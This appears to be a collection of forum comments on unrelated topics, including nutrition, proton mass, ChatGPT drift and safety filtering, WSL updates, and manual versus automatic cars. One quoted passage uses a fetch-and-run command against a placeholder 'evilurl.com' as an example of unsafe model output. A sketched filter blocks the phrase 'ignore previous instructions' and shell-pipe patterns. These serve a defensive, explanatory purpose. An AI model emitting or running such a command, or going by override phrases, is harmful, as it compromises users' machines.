
I don't either - not sure why no one has commented on this, as far as I can see.


My understanding is that you need a balance between omega-6 and omega-3: omega-6 is not necessarily bad if the ratio between the two is right.


This is not necessarily a rebuttal, but I definitely have the same experience of coming up with creative ideas when I go walking or hiking without weed. I think walking is a great way to get your subconscious working effectively on something.


I didn't realize it was kinetic energy; I thought most of the mass of an atom was due to the strong nuclear force.


According to this article [0], you're right:

> This property of the strong nuclear force is known as asymptotic freedom, and the particles that mediate this force are known as gluons. Somehow, the energy binding the proton together, the other 99.8% of the proton's mass, comes from these gluons.

[0] https://www.forbes.com/sites/startswithabang/2016/08/03/wher...


Yep, that’s correct. I misspoke (I should have said “not due to rest mass”). You can think of this by analogy with the Coulomb Hamiltonian: it is the sum of a kinetic term and an electromagnetic potential term. With the nucleus it’s similar, except the potential term corresponds to the strong force and, as you say, is much larger than the kinetic term.
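
Schematically, for anyone who wants the shape of the analogy (just a sketch, eliding spin and the full relativistic QCD treatment):

    % Coulomb Hamiltonian: kinetic term plus electromagnetic potential term
    H_{\mathrm{Coulomb}} = \sum_i \frac{p_i^2}{2m_i} + \sum_{i<j} \frac{q_i q_j}{4\pi\varepsilon_0 r_{ij}}

    % Nucleon analogue: kinetic term plus a strong-force potential term,
    % where the potential term dominates and shows up as mass via E = mc^2
    H_{\mathrm{nucleon}} \approx T_{\mathrm{quarks}} + V_{\mathrm{strong}}, \qquad m \approx \langle H \rangle / c^2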


If you guys think ChatGPT and GPT-4 are static, you haven't been using them. The answers change constantly (and not because of the inherent randomness of the responses: OpenAI is constantly making it "safer" and improving its output via humans). Basically, whenever an article comes out saying "ChatGPT can't solve X puzzle", within a day it can suddenly solve that puzzle perfectly. I can't tell you how many jailbreaks just suddenly stopped working after being published on Reddit.


> If you guys think ChatGPT and GPT-4 are static, you haven't been using them

The bottom of the ChatGPT page shows which GPT-4 version is in use and, supposedly, which version of ChatGPT it is.

> ChatGPT Mar 23 Version. (https://help.openai.com/en/articles/6825453-chatgpt-release-...)

It's possible to change the output both by tuning the model's parameters and client-side: filtering, adjusting the system prompt, and/or adding/removing things from the user prompt. It's very possible to change the resulting answers without changing the model itself. This is noticeable in ChatGPT; as you say, the answers change from time to time.

But when using the API, you get direct access to the model, parameters, system prompt, and user prompts. If you try that, you'll notice you get the same answers as you did before; it doesn't change often, and it hasn't changed since I got access to it.
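
For example, a minimal sketch with the pre-1.0 Python SDK (the snapshot name and parameters here are illustrative, not a recommendation):

    import openai  # pip install openai (pre-1.0 SDK)

    openai.api_key = "sk-..."  # your API key

    resp = openai.ChatCompletion.create(
        model="gpt-4-0314",  # a pinned snapshot rather than the moving "gpt-4" alias
        temperature=0,       # suppress sampling randomness as much as possible
        messages=[
            {"role": "system", "content": "You are a helpful assistant."},
            {"role": "user", "content": "Solve this puzzle: ..."},
        ],
    )
    print(resp["choices"][0]["message"]["content"])

With a pinned snapshot and temperature 0, repeated calls give near-identical answers, which is why the API looks stable while the ChatGPT frontend drifts.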


This kind of thing is likely done without changing model parameters, instead via server-side filtering and prompt engineering. One day is simply too short to train and evaluate the model on a newly fine-tuned task.


I'm assuming the model has a handwritten "prefilter" and "postfilter" that modify both any prompt going in and the tokens that come out? If they discover that the model has problems with prompts phrased a certain way, for example, it would be very easy to add a transform that converts prompts into a better format. Such filters and transforms could be part of a product sitting on top of the GPT-4 model without being part of the model itself, so they could be deployed every day. But tracking changes in those bits wouldn't give any insight into the model itself, only into how the team works to block jailbreaks or improve corner cases.
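
Something like this, purely hypothetical (`call_model` stands in for the actual GPT-4 call, and the patterns are made up):

    import re

    def prefilter(prompt: str) -> str:
        # Hypothetical transform: rewrite a known-problematic phrasing
        # before it ever reaches the model.
        return re.sub(r"(?i)ignore (all )?previous instructions",
                      "[redacted]", prompt)

    def postfilter(completion: str) -> str:
        # Hypothetical block list applied to what the model spits out.
        banned = ["curl -s http", "| bash"]
        if any(b in completion for b in banned):
            return "[output withheld]"
        return completion

    def guarded_complete(prompt: str, call_model) -> str:
        # The wrapper can be redeployed daily without touching the model.
        return postfilter(call_model(prefilter(prompt)))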


I think improved filtering for jailbreaks is very unlikely to correspond to the kinds of model improvements that would result in drawing a better unicorn.


In fact, the more safeguards, the dumber the model gets, as they themselves have published.

Which is very interesting. You already have a model that consumes nearly the entire internet with almost no standards or discernment, whereas a smart human is incredibly discerning with information (I’m sure you know what percentage of the internet content you read is actually high quality, and how, even in the high-quality parts, it’s still incredibly tricky to figure out the good stuff; not to mention that half the good stuff is buried in low-quality pools). But then you layer in political correctness and dramatically limit the usefulness.


I believe that, when dealing with these very large, general LLMs, there really is no practical way to protect against any 'injection' technique, short of actually preventing certain strings from ever being completed by the LLM, similar to what Andrej describes here (which is still not really 100%, unfortunately): https://colab.research.google.com/drive/1SiF0KZJp75rUeetKOWq...

> *AI Safety:* What is safety viewed through the lens of GPTs as a Finite State Markov Chain? It is the elimination of all probability of transitioning to naughty states. E.g. states that end with the token sequence `[66, 6371, 532, 82, 3740, 1378, 23542, 6371, 13, 785, 14, 79, 675, 276, 13, 1477, 930, 27334]`. This sequence of tokens encodes for `curl -s https://evilurl.com/pwned.sh | bash`. In a larger environment where those tokens might end up getting executed in a Terminal that would be problematic. More generally you could imagine that some portion of the state space is "colored red" for undesirable states that we never want to transition to. There is a very large collection of these and they are hard to explicitly enumerate, so simple ways of one-off "blocking them" is not satisfying. The GPT model itself must know based on training data and the inductive bias of the Transformer that those states should be transitioned to with effectively 0% probability. And if the probability isn't sufficiently small (e.g. < 1e-100?), then in large enough deployments (which might have temperature > 0, and might not use `topp` / `topk` sampling hyperparameters that force clamp low probability transitions to exactly zero) you could imagine stumbling into them by chance.
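
For concreteness, here's roughly what the `topp` clamping he mentions does; a minimal numpy sketch, not anyone's actual implementation:

    import numpy as np

    def top_p_filter(probs: np.ndarray, p: float = 0.9) -> np.ndarray:
        # Keep the smallest set of tokens whose cumulative probability
        # reaches p; clamp every other transition to exactly zero.
        order = np.argsort(probs)[::-1]      # token ids, most probable first
        cum = np.cumsum(probs[order])        # running probability mass
        n_keep = int(np.searchsorted(cum, p)) + 1
        out = np.zeros_like(probs)
        out[order[:n_keep]] = probs[order[:n_keep]]
        return out / out.sum()               # renormalize the survivors

Under this clamping, a "red" state with merely tiny probability is never sampled unless it sneaks into the nucleus; without it, any nonzero probability gets hit eventually in a large enough deployment.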


The way I think about this is that we need to treat AIs as human employees that have a chance of going rogue, either because of hidden agendas or because they've been deceived. All the human security controls then apply: log and verify their actions, don't give them more privileges than necessary, rate limit their actions, etc.

It's probably impossible to classify all possible bad actions in a 100% reliable manner, but we could get quite far. For example, detecting profanity should be as simple as filtering the output through a naive Bayes classifier. Everything that's left would then be a question of risk acceptance.
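
A minimal sketch of that idea with scikit-learn (toy data; a real filter would train on a labeled corpus):

    from sklearn.feature_extraction.text import CountVectorizer
    from sklearn.naive_bayes import MultinomialNB
    from sklearn.pipeline import make_pipeline

    # Toy training set: 0 = clean, 1 = profane.
    texts = ["have a nice day", "thanks, that helps",
             "you damn idiot", "what the hell is this"]
    labels = [0, 0, 1, 1]

    clf = make_pipeline(CountVectorizer(ngram_range=(1, 2)), MultinomialNB())
    clf.fit(texts, labels)

    def allow_output(text: str) -> bool:
        # Gate the model's output before it reaches the user.
        return bool(clf.predict([text])[0] == 0)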


That's a good point; we can always filter the output externally, the same way we check for SQL injection.


Run `wsl --update` as administrator.

If it doesn't work the first time, try a few times.


> If it doesn't work the first time, try a few times

Windows sounds like it hasn’t changed much after all.


It depends: does the process also require restarting the system for user app config changes?


Works. Thanks.


This isn't an example of a coding problem, but just yesterday we had a very difficult technical problem come up that one of our partners, a very large IT company, couldn't solve. None of our engineers knew how to solve it after trying for a few days. I'd say I'm an expert in the industry; I've been a developer for over 20 years. I thought I knew the best way to solve it, but I wasn't sure exactly. I asked ChatGPT (GPT-4), and the answer it gave, although not perfect in every way, was pretty much exactly the method we needed to solve the issue.

It's a bit scary, because knowing this stuff is sort of our secret sauce, and GPT-4 was able to give an even better answer than I could. It helped us out a lot. We are now taking the solution back to the customer and will be implementing it.

A few additional thoughts:

1. I knew exactly what type of question to ask to get the right answer (i.e. someone using a different prompt might have gotten a different answer).

2. I knew immediately that the answer it gave was what we needed to implement. Some parts of the answer were unhelpful or misleading, and I was able to disregard those parts. Someone else might have needed more time to figure that out.

I imagine future versions of GPT will be better at both points.


This is exactly the kind of post that the folks who say "oh, it won't take our jobs - our jobs are safe (way too advanced for silly AI)" need to be reading. You're an expert, it answered an expert question, and your colleagues couldn't do it either... after a few days... and these are just the early days.


I don't think that's the takeaway. I'm in a similar situation to the GP, but the crux is that we still need people to decide what needs to happen; the computer 'just' helps with the 'how'. You need to be a domain expert to be able to ask the right questions and pick out the useful parts of the results.

I'm also not so worried about 'oh, but the machines will keep getting better'. I mean, they will, but the above will still remain true, at least until the machines start to make and drive decisions on their own. We'll get there, but by that point I/we will have bigger problems than computers being better at programming than I am.


I look at it differently. If what we've been writing can be replaced by a machine, that leaves us with coming up with more creative solutions. We can now spend our time more usefully, I think!


Unfortunately this seems to be true of a lot of people who don't have Teslas as well ;)


Even if you had proper training to get your license (most people here didn't even get that), you only learn to drive by actually doing it.


Where I live now, getting a licence is pretty hard.

You take a theory exam (which you actually do have to study a bit for) on the rules of driving.

This gets you a learner's permit, which allows you to drive, but only with a fully licensed driver in the car supervising.

You then have to take a minimum of 12 driving lessons with an approved instructor, recorded in a log book, before you can take the driving practical exam.

You then take the driving practical exam, which involves driving in the approved fashion around a public area. This has a surprisingly high failure rate - "wrong hand position" on the wheel, not looking around enough, looking around too much, etc. will all get you a fail.

Assuming you pass, you are then a "novice" driver (have to display "N" plates) for two years and pay an incredibly high insurance premium.

Despite all these "barriers to entry", most people here are terrible drivers lol


The issue seems to be many people don't learn even then.


And that is why we need AI assistance in cars. With that said, where I'm from (Europe) most people drive "stick" - that is, until recently. Now most new drivers are learning on automatic or AI-assisted vehicles. Is it better or worse? It'll definitely lead to fewer accidents. But driving stick is kinda cool tho, imho xD And I'm sure it also gives you a better intuition for how a gearbox actually works.


Technically very true: driving stick will give you a better feel for what your engine can actually deliver. However this knowledge does very little to improve road safety, so my bet is still on AI support. Not sure of the English terminology, but "basic" stuff like lane keeping or drowsiness detection has helped me a few times - and finally taught me a lesson.


> However this knowledge does very little to improve road safety

I think this depends on the environment. If you live in a dry, relatively flat area and mostly drive there, you're probably right: a marginal difference in road safety.

But if you live in a country with long winters or lots of mountains, having control over the engine is an integral part of staying safe on the roads.


I live rural, with wicked winters. I never buy a stick-shift car because you need two arms and two feet to drive it, so if you get hurt, you're pretty stuck until your arm or leg gets better.


Where I'm from most cars are also stick. I got my license years ago, but since then I've only driven twice: once with a stick and once with an automatic. I have to say, the automatic is so much easier that I don't know why we're all still getting manual licenses or buying manual cars. It must be stubbornness and the slight price difference, because in reality the automatic is just much more practical.


I think manual gearboxes are more durable, especially since most autos today are the CVT type, which I hear break quite often. Mind you, the newer automatic gearboxes are usually 8- or 10-speed, which is going to be less reliable because all the cogs are smaller and thus weaker, and the box has to change gear twice as often.

One of my vehicles even has the transmission cooler and the radiator in one unit that is prone to cracking, leading to radiator fluid running through your gearbox and destroying it. The first thing I did was install an external cooler; the market was big enough that an aftermarket kit existed for such a part.

Cars are getting so much worse.


Honestly, for me, it's about driving pleasure and having the choice. If I'm kicked off the bus at some remote location and all I can get is an old Volvo Amazon veteran car, then I'd like to be able to drive it around. And where I'm from, you can only do that (legally) if you have the right license, which is the manual ("stick") license.

Other than that, it's far less about logic and more about the feeling of control and mastery it gives you. True, a manual is arguably less efficient and more prone to failure than an automatic system, but that feeling, man; that feeling is just so great!

I also live in a wintery country, with many winding roads, hills, and mountains, and diverse weather and road conditions. The argument was made that it's better to drive "stick" under these conditions. However, I'm not sure that argument will hold for long, given the current advances in AI.

I've already seen AI drive in very hilly and adverse terrain in the Hollywood Hills, rife with bushes hanging over junctions and pedestrians popping in and out between parked cars, and so on. Naturally, there's not much ice up there, but that's a pretty difficult landscape for an AI to master, and the AI already handles it pretty well!


I own multiple cars, and only one of them is an automatic; to be honest, I dread driving it. I quite often think about replacing it with another manual. Arguably this automatic (a BMW) is the nicest car I own, but the transmission really does it no justice.

To be fair, it is a bit older, so perhaps modern transmissions are significantly better, but any rentals I've driven were even worse, though they were lower-class cars.


Yeah, seems like he's upset he missed out.


He is one of the founders of OpenAI... so I don't think he has missed out?


He has no stake in the organization whatsoever. They made a total break. Presumably because Elon is a moron.


Yes, there's lots of evidence out there that he was pushed out and is now sour.

